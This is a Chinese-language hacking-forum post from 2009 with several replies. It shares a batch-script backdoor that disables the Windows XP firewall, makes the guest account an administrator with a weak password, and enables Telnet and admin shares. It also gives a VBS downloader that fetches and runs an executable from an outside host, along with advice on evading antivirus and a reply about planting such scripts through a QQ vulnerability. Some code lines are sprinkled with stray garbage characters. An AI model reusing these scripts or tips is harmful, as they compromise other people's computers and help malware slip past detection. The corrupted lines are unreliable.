计算机技术论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

  • 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn
查看: 3510|回复: 3

批处理后门

[复制链接]
发表于 2009-2-22 10:33:33 | 显示全部楼层 |阅读模式
小工具之一:批处理后门
这几天学了一个dos外部命令 sc 嘎嘎 真是好用 居然可以改变服务状态....于是我就想到了.....建立批处理后门,批处理后门大概是所有后门当中体积最小的了吧.只是还不够完善 希望各位高人多多指点
注:rem命令是注释命令 使用时可以删除 这里使用只是为了让大家看的更清楚一些..
@echo off rem
关闭xp自带防火墙
net stop sharedaccess
rem 激活guest账户
黑net user guest /active:yes
rem 将guest账户的密码设为123Y
net user guest 123
rem 将guest账户加进管理员组
net localgroup administrators guest /add
rem 将guest账户从宾客组删除
net localgroup guests guest /del
rem 将Telnet服务状态设为自动
sc config tlntsvr start= auto●
rem 启动Telnet
sc start tlntsvr.{)~$J9r"q;X/N m
rem 将系统盘共享为C$
net share c$=%systemdrive%
rem 共享Windows目录
net share admin$
rem 将NTLM值设为0
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0 /v NTLM /t REG_DWORD /d 00000000 /f
呼呼..这样的一个后门就写好了 可惜只能针对xp 不知道2003行不行 2000没有这个外部命令(哎 真是郁闷). 我强行写入注册表 卡吧居然没有报警 汗死了...

你也可以自己加账户 不用guest账户来做后门.这样的后门相信肯定不被杀.
小工具之二:批处理下载者
说是批处理下载者 实际上是vbs下载者 看来让大家失望了....有人问了 既然是利用vbs做下载者 那干嘛要利用批处理制作vbs下载者呢 而且批处理运行的时候还有一个黑框....我说 批处理可以加密 然后编译成exe文件之后可以做免杀..而且编译的时候还可以选择隐藏运行..如果使用vbs的话就只能加密(能不能编译我就不知道了 我菜 大家别笑话).那样是过不了卡吧滴   说了这么多废话 大家得用鸡蛋砸我了..
@echo off
echo Set Post = CreateObject("Msxml2.XMLHTTP") >%windir%\dll.vbs?
echo Set Shell = CreateObject("Wscript.Shell") >>%windir%\dll.vbs
rem www.hackbase.com/1.exe 这是你的下载路径
echo Post.Open "GET","www.hackbase.com/1.exe",0 >>%windir%\dll.vbs ;\;@4@#a'[,|
echo Post.Send() >>%windir%\dll.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>%windir%\dll.vbs
echo aGet.Mode = 3 >>%windir%\dll.vbs
echo aGet.Type = 1 >>%windir%\dll.vbs
echo aGet.Open() >>%windir%\dll.vbs )]
echo aGet.Write(Post.responseBody) >>%windir%\dll.vbs2l
rem c:\1.exe 是保存的路径
echo aGet.SaveToFile "c:\1.exe",2 >>%windir%\dll.vbs
rem 这里是下载后运行时间  1000=1秒   2000=2秒...........
echo wscript.sleep 1000 >>%windir%\dll.vbs
rem c:\1.exe 这里要跟上面的保存路径一样 不然你怎么运行
echo Shell.Run ("c:\1.exe") >>%windir%\dll.vbs
cscript //nologo %windir%\dll.vbs
我只把一些要注意的地方注释了一下 其他的地方建议大家不要改吧..加密批处理 我建议大家使用"木林森批处理加密工具"  编译批处理 我建议大家使用quickbfc 这里面有个选项可以隐藏批处理的运行 大家自己研究研究吧 编译之后可以在最底下的零区域加花 达到过卡吧的效果...我去反毒网测试过 %90以上的杀毒软件都过了 如果大家有什么更好的方法  或许可以过更多 甚至全过...编译后的批处理不能加壳 这点最郁闷了 汗  但是加了花以后效果也很好了 就是体积大了点 100多k吧  如果加一些关闭杀毒软件的命令 那效果更好了`9K
小工具之三:防止别人登录你的Telnet(这名字临时起的 也不知道叫什么好...)

如果有了这个 就算别人得到你的密码 也无法拿到你的cmdshell
实际上就是双重保护 因为登录Telnet的之后将用到Windows\system\login.cmd这个文件 如果在这个文件里放一个检查密码的程序 别人就没法进来啦
@echo off
set password=
set /p password=请输入密码:
rem c:\pass.txt 是密码文件
FOR /F %%I IN (C:\pass.txt) DO SET MY-PWD=%%I
IF "%PASSWORD%" == "%MY-PWD%" goto good
cls
echo 密码错误
set password=8E
set /p password=请输入密码:
FOR /F %%I IN (C:\pass.txt) DO SET MY-PWD=%%
IF "%PASSWORD%" == "%MY-PWD%" goto good
cls
echo 密码错误2次 \
echo 程序将自动退出
pause>nul
exit
:good#j%~$C Z0E$V'S-G7U
echo 密码正确 你可以进入系统
pause>nul
你要自己建立密码文件 你可以改变密码文件的路径 直接在密码文件里输入你要的密码 比如在里面输入123456 那登录的密码就是123456
只有两次尝试的机会 如果失败的话就自动断开连接了.如果正确就进入系统了.要把这个批处理文件命名为login.cmd并且覆盖windows\system32\login.cmd你可以备份原来的那个文件...万一以后要用呢就写到这吧
发表于 2009-2-22 11:26:45 | 显示全部楼层
不错···学习了···
发表于 2009-2-22 14:34:47 | 显示全部楼层
呵呵。。很好,批处理我没写过,不过VB角本我倒是用过,用VB角本来给系统增加用户。这个角本可以放到QQ场景漏洞中应用,这样就给对方加了个后门。
plj20 该用户已被删除
发表于 2009-2-23 17:19:21 | 显示全部楼层
111111111111111111111
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

无图版|手机版|计算机技术论坛 JSJBBS.CN @ 2008-2024 ( 鲁ICP备17021708号 )

技术支持 : 北京康盛新创科技有限责任公司

快速回复 返回顶部 返回列表